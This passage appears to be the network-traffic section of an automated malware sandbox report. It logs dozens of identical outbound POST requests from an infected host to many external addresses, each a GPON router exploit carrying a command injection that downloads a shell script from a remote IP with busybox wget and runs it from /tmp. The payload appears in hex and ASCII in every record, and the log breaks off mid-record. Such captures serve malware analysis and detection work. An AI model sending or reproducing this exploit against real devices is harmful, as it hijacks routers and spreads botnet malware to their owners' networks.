                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1723192.168.2.1336610212.37.109.43443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.816545010 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1724192.168.2.1332826118.65.56.177443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.816598892 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1725192.168.2.1334548109.109.237.6443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.816643000 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1726192.168.2.1340192118.81.123.231443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.816657066 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1727192.168.2.13374145.231.142.199443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.816735029 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1728192.168.2.135806242.175.54.248443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.816757917 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1729192.168.2.1352740212.160.206.32443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.816773891 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1730192.168.2.1345628118.174.248.129443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.816836119 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1731192.168.2.1345652109.157.13.213443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.816855907 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1732192.168.2.134576242.153.109.61443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.816874981 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1733192.168.2.1358594118.240.33.78443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.816907883 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1734192.168.2.1360540212.220.67.124443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.816956997 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1735192.168.2.1346228109.149.152.161443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.817012072 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1736192.168.2.135594642.236.140.195443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.817012072 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1737192.168.2.13454345.80.47.245443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.817047119 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1738192.168.2.1335334212.103.56.221443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.817070961 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1739192.168.2.1335442212.137.97.149443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.817089081 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1740192.168.2.1359194212.40.183.223443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.817121983 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1741192.168.2.135982442.202.187.228443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.817121983 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1742192.168.2.1344218118.212.17.118443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.817138910 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1743192.168.2.1358350109.29.237.29443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.817188978 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1744192.168.2.1358174212.79.87.37443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.817228079 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1745192.168.2.1360274118.8.190.55443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.817234039 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
